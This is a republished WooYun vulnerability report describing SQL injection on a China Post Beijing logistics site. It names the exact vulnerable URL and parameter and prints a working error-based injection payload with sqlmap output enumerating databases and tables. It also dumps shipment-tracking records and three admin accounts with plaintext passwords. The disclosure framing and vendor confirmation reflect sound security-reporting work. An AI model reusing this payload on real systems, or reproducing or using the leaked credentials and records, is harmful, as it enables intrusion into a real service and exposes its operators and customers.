中国邮政北京分公司某站点多处SQl注入(一百多万的转运信息)

admin
admin
admin
139297
文章
114
评论
2017年4月23日22:15:25评论237 views字数 235阅读0分47秒阅读模式
摘要

2016-04-09: 细节已通知厂商并且等待厂商处理中
2016-04-09: 厂商已经确认,细节仅向厂商公开
2016-04-19: 细节向核心白帽子及相关领域专家公开
2016-04-29: 细节向普通白帽子公开
2016-05-09: 细节向实习白帽子公开
2016-05-24: 细节向公众公开

漏洞概要 关注数(6) 关注此漏洞

缺陷编号: WooYun-2016-194358

漏洞标题: 中国邮政北京分公司某站点多处SQl注入(一百多万的转运信息)

相关厂商: 中国邮政集团公司信息技术局

漏洞作者: 路人甲

提交时间: 2016-04-09 20:05

公开时间: 2016-05-24 20:20

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 12

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: asp+sqlserver注射

0人收藏

漏洞详情

披露状态:

2016-04-09: 细节已通知厂商并且等待厂商处理中
2016-04-09: 厂商已经确认,细节仅向厂商公开
2016-04-19: 细节向核心白帽子及相关领域专家公开
2016-04-29: 细节向普通白帽子公开
2016-05-09: 细节向实习白帽子公开
2016-05-24: 细节向公众公开

简要描述:

多个地方SQL注入

详细说明:

code 区域 
http://www.bj-cnpl.com

中 国 邮 政 速 递 物 流 股 份 有 限 公 司 北 京 市 分 公 司

系统多处存在SQL注入,泄露一些运单信息

code 区域 
http://www.bj-cnpl.com/showstate.asp?orderno=CI065580410JP*&x=38&y=1

中国邮政北京分公司某站点多处SQl注入(一百多万的转运信息)

orderno存在SQL注入

code 区域 
current user:    'cnpluser'
code 区域 
Parameter: #1* (URI)
     Type: error-based
     Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
     Payload: http://www.bj-cnpl.com:80/showstate.asp?orderno=-3966') OR 7043=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7043=7043) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(113))) AND ('Quqa'='Quqa&x=38&y=1
 ---
 web server operating system: Windows 2003 or XP
 web application technology: ASP.NET, Microsoft IIS 6.0, ASP
 back-end DBMS: Microsoft SQL Server 2005
 sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: #1* (URI)
     Type: error-based
     Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
     Payload: http://www.bj-cnpl.com:80/showstate.asp?orderno=-3966') OR 7043=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7043=7043) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(113))) AND ('Quqa'='Quqa&x=38&y=1
 ---
 web server operating system: Windows 2003 or XP
 web application technology: ASP.NET, Microsoft IIS 6.0, ASP
 back-end DBMS: Microsoft SQL Server 2005
 available databases [6]:
 [*] AT
 [*] ATRACK
 [*] master
 [*] model
 [*] msdb
 [*] tempdb
code 区域 
Database: ATRACK
 [19 tables]
 +---------------------+
 | CNPL_DNJ_REDOC      |
 | Logistic_DNJ        |
 | Logistic_POD_Status |
 | Logistic_Russia     |
 | Logistic_Shipment   |
 | Logistic_State      |
 | Logistic_Upload_D   |
 | Logistic_Upload_I   |
 | Logistic_Upload_M   |
 | Logistic_User       |
 | MAN_DT              |
 | MAN_HD              |
 | atrackdssw21        |
 | atrackdssw22        |
 | atrackdssw23        |
 | atrackdssw24        |
 | atrackdssw25        |
 | sysdiagrams         |
 | 中邮与俄方状态对照表|
 +---------------------+
code 区域 
Database: ATRACK
 +-------------------------+---------+
 | Table                   | Entries |
 +-------------------------+---------+
 | dbo.Logistic_State      | 1641873 |转运信息
 | dbo.CNPL_DNJ_REDOC      | 348257  |
 | dbo.Logistic_Upload_I   | 1259    |
 | dbo.Logistic_Upload_M   | 1237    |
 | dbo.Logistic_Shipment   | 941     |
 | dbo.Logistic_POD_Status | 47      |
 | dbo.Logistic_Russia     | 23      |
 | dbo.MAN_DT              | 17      |
 | dbo.Logistic_User       | 11      |
 | dbo.Logistic_Upload_D   | 6       |
 | dbo.MAN_HD              | 6       |
 | dbo.Logistic_DNJ        | 1       |
 +-------------------------+---------+
code 区域 
Table: Logistic_State
 [3 entries]
 +-------------------+-------------------+--------------------+---------------------------------+--------------------+--------------------+---------------------------------+---------------------+---------------------+---------------------+-----------------------------+------------------------------+
 | Logistic_State_ID | Logistic_State_No | Logistic_State_DT  | Logistic_State_Eng              | Logistic_State_Chn | Logistic_State_OPS | Logistic_State_Memo             | Logistic_State_City | Logistic_State_Time | Logistic_State_Sign | Logistic_State_Code_Problem | Logistic_State_Code_PINumber |
 +-------------------+-------------------+--------------------+---------------------------------+--------------------+--------------------+---------------------------------+---------------------+---------------------+---------------------+-----------------------------+------------------------------+
 | 10000             | BPIL870050205     | 11 20 2012  1:18PM | Arrived on an airport warehouse | 到达机场监管中心           | admin              | Arrived on an airport warehouse | Moscow, Russia      | 11 10 2012  3:00PM  | <blank>             | <blank>                     | STA  56                      |
 | 100000            | CT287578855CN     | 02 27 2014  9:06AM | Shipment Out of Delivery        | 快件外出派送             | admin              | <blank>                         | CANADA              | 02 26 2014 12:19PM  | <blank>             | <blank>                     | SH003                        |
 | 1000000           | 98723A925         | 09 22 2015  8:25AM | Shipment forwarded              | 快件转运               | admin              | <blank>                         | 东莞                  | 09 22 2015  6:57AM  | <blank>             | <blank>                     | SH272                        |
 +-------------------+-------------------+--------------------+---------------------------------+--------------------+--------------------+---------------------------------+---------------------+---------------------+---------------------+-----------------------------+------------------------------+

漏洞证明:

用户密码什么的没有加密

code 区域 
+------------------+--------------------+---------------------+-----------------------+------------------------+
 | Logistic_User_ID | Logistic_User_Name | Logistic_User_Power | Logistic_User_Enabled | Logistic_User_Password |
 +------------------+--------------------+---------------------+-----------------------+------------------------+
 | 1                | admin              | ADMIN               | YES                   | lzyouzheng             |
 | 10               | emskf              | ADMIN               | YES                   | kefuzhongxin           |
 | 11               | guoji              | ADMIN               | YES                   | guojifengongsi         |
 +------------------+--------------------+---------------------+-----------------------+------------------------+

登陆后台,发现后台又有SQL注入

新添加状态,填入“'”

中国邮政北京分公司某站点多处SQl注入(一百多万的转运信息)

中国邮政北京分公司某站点多处SQl注入(一百多万的转运信息)

中国邮政北京分公司某站点多处SQl注入(一百多万的转运信息)

另外两处

中国邮政北京分公司某站点多处SQl注入(一百多万的转运信息)

中国邮政北京分公司某站点多处SQl注入(一百多万的转运信息)

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2016-04-09 20:12

厂商回复:

谢谢。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin